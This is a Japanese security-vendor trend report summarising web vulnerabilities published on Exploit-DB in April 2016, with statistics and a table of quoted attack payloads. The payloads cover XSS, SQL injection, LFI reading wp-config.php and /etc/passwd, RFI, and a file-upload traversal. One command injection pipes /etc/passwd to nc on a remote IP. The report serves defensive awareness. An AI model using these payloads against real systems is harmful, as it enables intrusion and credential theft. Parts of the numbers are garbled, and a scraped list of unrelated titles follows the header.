最新 Web トレンドレポート (06.04) ~ Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4

Similar documents
最新 Web 脆弱性トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06

最新 Web 脆弱性トレンドレポート (05.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム

EDB-Report 最新 Web トレンドレポート (05.) 05..0~05.. Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 05

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (05.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

サマリー EDB-Report ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 8 月に公開された Exploit-DB の分析結果 Cross Site Scripting の攻撃に対する脆弱性報告件数が最も多かったです 発見された Cross Site



最新 Web 脆弱性トレンドレポート (08.0) ~08.0. Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム サマリー 08 年

最新 Web トレンドレポート (06.03) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 3

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (207.09) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センタ

EDB-Report 最新Web脆弱性トレンドレポート(5.4) 5.4.~5.4.3 Exploit-DB( ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 5

サマリー EDB-Report 最新 Web 脆弱性トレンドレポート (06.07) ~ Exploit-DB( より公開されている内容に基づいた脆弱性トレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデー

最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ

サマリー EDB-Report 最新 Web トレンドレポート (06.0) ~ Exploit-DB( より公開されている内容に基づいたトレンド情報です ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチー

Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved. 3 Copyright 2006 Mitsui Bussan Secure Directions, Inc. All Rights Reserved.

5-5_arai_JPNICSecSemi_XssCsrf_CM_ PDF

ハピタス のコピー.pages

Copyright 2008 All Rights Reserved 2

相続支払い対策ポイント

150423HC相続資産圧縮対策のポイント

96 8 PHPlot 1. ( 8.1) 4 1: // 2: // $_SERVER[ HTTP_REFERER ]... 3: // $_SERVER[ HTTP_USER_AGENT ]... 4: // $_SERVER[ REMOTE_ADDR ]... ( ) 5: // $_SERV

初心者にもできるアメブロカスタマイズ新2016.pages

- 2 Copyright (C) All Rights Reserved.

untitled

Copyright All Rights Reserved. -2 -!

Systemwalker IT Service Management Systemwalker IT Service Management V11.0L10 IT Service Management - Centric Manager Windows

IPA:セキュアなインターネットサーバー構築に関する調査

PowerPoint Presentation

PowerPoint プレゼンテーション

Microsoft Word - 最終版 バックせどりismマニュアル .docx

Microsoft PowerPoint - webapp.ppt [互換モード]

2

SiteLock操作マニュアル

untitled

Copyright Qetic Inc. All Rights Reserved. 2

Releases080909

内容 エグゼクティブサマリー 攻撃状況の概況 観測手法 収集結果 アカウントに対する攻撃 攻撃概要 攻撃状況 対策 テーマに対する攻撃 攻撃概要...

実施していただく前に

健康保険組合のあゆみ_top

リバースマップ原稿2

OpenRulesモジュール

WordPress Ktai Style Ktai Entry 18 Mac 18

Drive-by-Download攻撃における通信の 定性的特徴とその遷移を捉えた検知方式

Copyright 2017 JAPAN POST BANK CO., LTD. All Rights Reserved. 1

% 11.1% +6.% 4, % %+12.2% 54,16 6.6% EV7, ,183 Copyright 216 JAPAN POST GROUP. All Rights Reserved. 1

WEBシステムのセキュリティ技術

MultiPASS Suite 3.20 使用説明書

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.14 P.15 P.16 P.16 P.17 P.19 P.20 P.22 P P P P P P P P P

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P.10 P.12 P.13 P.14 P.14 P.15 P.17 P.18 P.20 P P P P P.25 P.27 P.28 Copyright 2016 JAPAN POST BA

MultiPASS B-20 MultiPASS Suite 3.10使用説明書

Oracle Fail Safe For Windows NT and Windows 2000 リリース・ノート、リリース 3.1.2

やよいの顧客管理

弥生給与/やよいの給与計算

弥生 シリーズ

弥生会計 プロフェッショナル/スタンダード/やよいの青色申告

弥生会計/やよいの青色申告

弥生会計 ネットワーク/プロフェッショナル2ユーザー


ウェブデザイン技能検定 1 級実技 平成 28 年度 第 4 回 ウェブデザイン技能検定 1 級 実技試験概要 試験にあたっての注意事項 試験者は本試験の留意事項 注意事項に留意して作業を行うこと ペーパー実技試験は 課題 1 から 5 までの 5 課題を 60 分間で行うこと 作業実技試験は 課題

OpenRulesモジュール

Copyright 2008 NIFTY Corporation All rights reserved. 2

hands_on_4.PDF

2.2 Reflected XSS 攻撃攻撃者の用意した悪意のあるリンクとターゲットサーバが同じホストである場合の Reflected XSS 攻撃を, 本稿では Reflected XSS 攻撃と呼ぶ. 例えば, サーバ A の target.php に Reflected XSS 脆弱性があった

Trend Micro Safe Lock 2.0 Patch1 管理コンソールのシステム要件 OS Windows XP (SP2/SP3) [Professional] Windows 7 (SP なし /SP1) [Professional / Enterprise / Ultimate] W

FileMaker Server Getting Started Guide

itechclassifieds Middle School Horizon QCMS myseatxt 0.34 Joomla JV Comment PizzaInn_Project XOS Simple e-document Taboada Macronews godontologico 5 E

Hitachi Storage Management Pack for VMware vrealize Operations サポートマトリクス (REV.04-00) Hitachi Storage Management Pack - Hitachi Storage Management Pack

P. 2 P. 4 P. 5 P. 6 P. 7 P. 9 P P.11 P.13 P.15 P.16 P.17 P.17 P.18 P.20 P.21 P.23 P P P P P P P P.31

Hitachi Storage Adapter -Hitachi Storage Adapter for VMware vCenter- サポートマトリックス

Password Manager Pro スタートアップガイド

FileMaker Server Getting Started Guide

nopcommerce Adobe Flash ( 1 ) 1 nopcommerce 2.2 ( [5, p.3-4] )

第3回_416.ppt

~ アドレス収集くん ~ セキュリティ対策御説明資料

MENU 키를 누르면 아래의 화면이 나타납니다

Copyright 2006 KDDI Corporation. All Rights Reserved page1

SQLインジェクション・ワームに関する現状と推奨する対策案

Microsoft Word - D JP.docx

FileMaker Server Getting Started Guide


<Documents Title Here>

UserManualMac_*3.pages

1000 Copyright(C)2009 All Rights Reserved - 2 -

FileMaker Server 9 Getting Started Guide

2011 年第 3 四半期脆弱性対策情報データベース JVN ipedia の登録状況 ( 詳細 ) 1. 脆弱性対策情報の登録状況 1.1 今四半期に登録した脆弱性の種類別件数 す 別紙 2 共通脆弱性タイプ一覧 CWE ( *12) は 脆弱性の種類を識別するための共通の脆弱性タイプの一覧で C

allows attackers to steal the username-password pair saved in the password manager if the login page or other pages in the same domain are vulnerable

! Copyright 2015 sapoyubi service All Rights Reserved. 2

report03_amanai.pages

report05_sugano.pages

Microsoft Project Project 1984 No.1 Project PMBOK (Project Management Body of Knowledge) 1 2 ( ) 3 3 Project 3 Project Standard/Professional Office Pr

いま本文ー校了データ0822.indd

SOC Report

タイトルを1~2行で入力 (長文の場合はフォントサイズを縮小)

システム要件 Trend Micro Safe Lock 2.0 SP1 Trend Micro Safe Lock 2.0 SP1 エージェントのシステム要件 OS Client OS Server OS Windows 2000 (SP4) [Professional] (32bit) Wind

別紙 年第 3 四半期脆弱性対策情報データベース JVN ipedia の登録状況 ( 詳細 ) 1. 脆弱性対策情報の登録状況 年第 3 四半期に登録した脆弱性の種類別件数図 8 のグラフは JVN ipedia へ 2012 年第 3 四半期に登録した脆弱性対策情

Windows Oracle -Web - Copyright Oracle Corporation Japan, All rights reserved.

untitled

目次 1. HLA Fusion 3.0 がインストール可能な環境 HLA Fusion 3.0 のインストール HLA Fusion 3.4 のインストール 初期設定用データベース接続 ( 初めての方のみ ) 既存データベースのUpg

Taro php.jtdc

shio_ PDF

Transcription:

06.04

最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 06 年 4 月公開された Exploit-DB の分析結果 クロスサイトスクリプティング (Cross Site Scripting) の攻撃に対する報告数が最も多かったです 分析されたクロスサイトスクリプティング (Cross Site Scripting) の攻撃は単にスクリプトをパラメーターに挿入する形式で Web 開発をする時 パラメーターに対するセキュアコーディングを適用していたなら 簡単に防ぐことができる攻撃パターンでした 該当が発見されたソフトウェアを使用する管理者は 最新バージョンのアップデートおよびセキュアコーディングを行い にさらされないように備えなければなりません 今月は 報告数が最近になって最も少ない期間でした しかし 攻撃危険度の側では先月と比べて相変わらず危険な様子を見せてくれています 特に SQL インジェクション (SQL Injection) 攻撃と関連し 特定の関数を使用する攻撃が成功すれば データベースの情報を簡単に類推できるので 第 次 第 次攻撃がすぐ発生しやすい危険なが発見されました 該当が発見されたソフトウェアを使用する管理者はパラメーター入力値の検証をさらに厳しく実施して 追加的に発生する可能性がある SQL インジェクション (SQL Injection) 攻撃に対して備えなければなりません. 別件数カテゴリファイルアップロード (File Upload) ローカルファイル挿入 (Local File Inclusion:LFI) RFIリモートファイル挿入 (Remote File Inclusion:RFI) コマンドインジェクション (Command Injection) SQL インジェクション (SQL Injection) 件数 クロスサイトスクリプティング (Cross Site Scripting : XSS) 合計 5 別件数 5 5 0 5 0 5 0. 危険度別件数 危険度 件数 割合 早急対応要 % 高 0 87% 合計 00% 危険度別分類 早急対応要 高 0. 攻撃実行の難易度別件数 難易度 件数 割合 難 9% 中 % 易 8 78% 合計 00% 攻撃実行の難易度別件数 8 難 中 易 4. 主なソフトウェア別発生件数ソフトウェア名 Desk op5 modified ecommerce Shopsoftware PHPBack RockMongo SocialEngine GLPi ManageEngine Password Manager Ovidentia OpenCart 合計 件数 主なソフトウェア別発生件数 Desk op5 modified ecommerce Shopsoftware Copyright 06 Penta Security s Inc. All rights reserved

最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 危険度分類基準早急対応要 : 攻撃が成功した場合システムへ侵入可高 : システム情報を取得するか あるいはクライアントに 次被害を及ぼす 中 : 情報漏洩攻撃実行難易度分類基準難 : 複数のを突いた攻撃パターン 対象のシステムの重要な情報を取得するため 高度な攻撃コードを採用したパターン 知らされていない攻撃コードを採用したパターンのいずれかに該当する中 : 攻撃手法自体は難しくないが 迂回コードを採用したパターン易 : 回のリクエストで攻撃が成立するパターン 複数回トライするも 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5 件以上発生した主なソフトウェア別の詳細情報 EDB 番号カテゴリ攻撃難易度危険度名ソフトウェア名 Copyright 06 Penta Security s Inc. All rights reserved

最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 06-04-0 9646 LFI 易高 WordPress Advanced Video Plugin.0 - admin-ajax.php LFI /wp-admin/adminajax.php?action=ave_publishpost&title=&short=rnd&ter m=rnd&thumb=../wp-config.php WordPress Advanced Video Plugin.0 06-04-05 9664 XSS 易高 ManageEngine Password Manager Pro 80 to 80 - AddMail.ve XSS POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 service=&serviceurl=&loginname=&password=<!--+-- +--><script>alert%8'xss'%9;<%fscript><!--+--+-- >&spassword=&tags=&rule=low&forwardurl=maila ccount.cc%f ManageEngine Password Manager ManageEngine Password Manager Pro 80 to 80 06-04-06 9668 SQL Injection 中高 SocialEngine 4.8.9 - SQL Injection /blogs/?category=0&end_date=&orderby=%0and% 0%8SELECT%0*%0FROM%0%8SELECT%8SLEE P%8IF%8MID%8version%8%9,,%9%0LIKE %05,99,0%9%9%9%9MTeU%9 SocialEngine SocialEngine 4.8. 06-04-06 9667 LFI 易高 9..7 - / LFI /../../../../../WEB-INF/web.xml 9.. 06-04-06 9667 RFI 易高 9..7 - login_post.jsp RFI /login_post.jsp?url=http://www.zeroscience.mk 9.. 06-04-06 9667 XSS 易高 9..7 - create_post.jsp XSS POST /webadmin/fileformats/create_post.jsp HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 9.. filenameextension="><script>alert(document.cookie)</scri pt> 06-04-08 9676 Command Injection 中早急対応要 op5 7..9 - command_test.php Command Injection /monitor/op5/nacoma/command_test.php?cmd_str=/bin/ cat%0/etc/passwd%0 %0nc%09.68..0%0 5555 op5 op5 7..9 POST /LiveTime/WebObjects/LiveTime.woa/wo/7.0.5.9.0..7. 0..0.0. HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.; WOW64; Trident/6.0) -Type: multipart/form-data; boundary=-------------- -------------7dd009908f 06-04- 9687 File Upload 易高 Desk 7..0, 7.0. -----------------------------7dd009908f and 6.5 - -Disposition: form-data; /LiveTime/WebObjects/LiveTime. name="0.5.9.0..7.0..0.0...4.0.0."; woa/wo/ File Upload filename="../../srv/tomcat6/webapps/livetime/bla5.jsp" -Type: application/octet-stream Desk Desk 7..0, 7.0. and 6.5 <HTML> <HEAD> <TITLE>Hello World</TITLE> </HEAD> <BODY> <H>Hello World</H> Today is: <%= new java.util.date().tostring() %> </BODY> </HTML> -----------------------------7dd009908f-- Copyright 06 Penta Security s Inc. All rights reserved

最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 06-04- 968 XSS 易高 POST /rockmongo/index.php?action=login.index HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 RockMongo PHP MongoDB Administrator..8 - index.php Chrome/6.0.9.75 Safari/55.7 XSS RockMongo RockMongo PHP MongoDB Administrator..8 06-04- 9679 Command Injection 易高 OpenCart..0. to..0.0 - index.php Command Injection username="><script>alert()</script> /shop_directory/index.php?route=account/edit&b=system &c=ls OpenCart OpenCart..0. to..0.0 06-04- 9687 XSS 易高 POST /LiveTime/WebObjects/LiveTime.woa/wo/8.0.5..0.4...0. HTTP/. Connection: CloseAccept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr Desk 7..0, 7.0. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows and 6.5 - NT 6.; WOW64; Trident/6.0) /LiveTime/WebObjects/LiveTime. -Type: multipart/form-data; boundary=-------------- woa/wo/ XSS -------------7dd009908f Desk Desk 7..0, 7.0. and 6.5 -----------------------------7dd009908f -Disposition: form-data; name="tf_orgunitname" "><script>alert()</script> -----------------------------7dd009908f-- 06-04- 9688 RFI 易高 Ovidentia troubleticketsmodule 7.6 - statistique_evolution.php RFI /troubletickets-7-6/programs/statistique_evolution.php?globals[babinstal lpath]=http://hack.com Ovidentia Ovidentia troubleticketsmo dule 7.6 06-04-4 9697 XSS 易高.0.0 - index.php XSS /phpmongodb/index.php/%%e%ciframe%0src=h ttp://www.phpmongodb.org%e.0.0 06-04-8 9705 XSS 易高 POST /wp-admin/admin.php?page=kentopvc_settings HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 WordPress Kento Post View Chrome/6.0.9.75 Safari/55.7 Counter Plugin.8 - admin.php XSS WordPress Kento Post View Counter Plugin. kento_pvc_today_text="<script>alert();</script><img src="b 06-04-8 9704 XSS 易高 WordPress leenk.me Plugin.5.0 - admin.php XSS POST /wp/wpadmin/admin.php?page=leenkme_facebook HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 WordPress leenk.me Plugin.5.0 facebook_description=%c%ftextarea%e%cscript %Eprompt%8%9%B%C%Fscript%E 06-04-9 970 SQL Injection 易高 modified ecommerce Shopsoftware.0.0.0 rev 9678 - easybillcsv.php SQL Injection /shop/api/easybill/easybillcsv.php?token=module_easybil L_CSV_CRON_TOKEN&orders_status=-'))orsleep(5)/*&customers_status=*/% modified ecommerce Shopsoftware modified ecommerce Shopsoftware.0.0.0 rev 9678 06-04-0 97 SQL Injection 難早急対応要 POST /phpback-..0/admin/ideas HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 PHPBack..0 - /phpback-..0/admin/ideas SQL Injection PHPBack PHPBack..0 search=&orderby=title,extractvalue(0x0a,concat(0x0a,(se lect USER()), 0x0a, (select DATABASE()), 0x0a, (select VERSION()))) Copyright 06 Penta Security s Inc. All rights reserved

最新 Web トレンドレポート (06.04) 06.04.0~06.04.0 Exploit-DB(http://exploit-db.com) より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 06-04- 974 XSS 易高.9.6 - phpliteadmin.php XSS POST /phpliteadmin/phpliteadmin.php?action=table_create&co nfirm= HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7.9.6 tablename=testtable&rows=&0_field=id&0_type=integ ER&0_defaultoption=defined"><script>alert()</script>&0 _defaultvalue=&_field=name&_type=integer&_def aultoption=defined&_defaultvalue=test 06-04-5 970 XSS 易高 - /admin/signups// XSS POST /admin/signups//background?screen=signupheader HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 signup[note]=<script>alert(onfirm(document.cookie)</scri pt> 06-04-5 970 XSS 易高 - /admin/sites//tags XSS POST /admin/sites//tags HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 page_tag[name]=<script>confirm(document.cookie)</scri pt> 06-04-5 970 XSS 易高 - /admin/sites//pages/ XSS POST /admin/sites//pages/?screen=seo HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7 page[headline]=volunteer<script>confirm(document.cook ie)</script> 06-04-6 977 SQL Injection 中高..9 - field.php SQL Injection POST /modules/profile/admin/field.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/55.7..9 quicksearch_mod_profile_field=aaaa') AND (SELECT * FROM (SELECT(SLEEP()))IRLV) AND ('DhUh' LIKE 'DhUh&button_quicksearch_mod_profile_Field=Search&fil tersel=default&limitsel=5 06-04-9 975 SQL Injection 難 /ajax/getdropdownconnect.php?fromtype=computer&ite mtype=computer&page=&page_limit=%0procedure %0analyse%8%8select%0extractvalue%8rand%8%9 早急対応要 getdropdownconnect.php SQL Inj,concat%80xa,%8IF%8MID%8version%8%9,,%9 GLPi GLPi 0.90. %0LIKE%05,%0BENCHMARK%85000000,SHA%8% 9%9,%9%9%9%9%9,%9 Copyright 06 Penta Security s Inc. All rights reserved